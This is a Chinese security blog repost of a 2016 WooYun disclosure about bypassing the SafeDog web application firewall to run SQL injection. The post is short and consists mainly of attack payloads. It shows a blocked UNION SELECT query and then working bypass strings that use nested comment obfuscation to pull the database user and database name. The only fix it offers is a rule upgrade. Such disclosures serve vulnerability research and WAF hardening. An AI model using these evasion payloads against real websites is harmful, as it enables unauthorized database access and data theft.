记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华
«亚马逊云环境存在远程命令执行...
阳光保险某险种业务系统任意用户密码重置... »

网站安全狗最新版SQL注入绕过

2016-07-12 21:15

测试环境:

code 区域
Windows XP + php + Apache 2.4.10 + mysql



环境.png



1、版本

绕过-1.png



2、尝试

code 区域
**.**.**.**/sql.php?id=-1/*!UNION ALL*//*!SELECT*/1,2,3



被拦截

绕过-2.png



难道是拦截union?select?还是关键字组合?以前安全狗版本还能看到正则,现在直接内置加密了。。。逆不出来了。

然后fuzzing一个个测试

3、绕过

防护全开

环境-1.png



payload:

code 区域
**.**.**.**/sql.php?id=-1/*/\*/UNION/*/\*/SELECT/*/\*/1,/*!USER*/(),uuid()



绕过-3.png



code 区域
**.**.**.**/sql.php?id=-1/*/\*/UNION/*/\*/SELECT/*/\*/1,/*!database*/(),uuid()



绕过-4.png

漏洞证明:

如上

修复方案:

规则升级

知识来源: www.wooyun.org/bugs/wooyun-2016-0195577

阅读:176349 | 评论:0 | 标签:注入 安全狗

想收藏或者和大家分享这篇好文章→复制链接地址

“网站安全狗最新版SQL注入绕过”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

随机推荐

标签云

本页关键词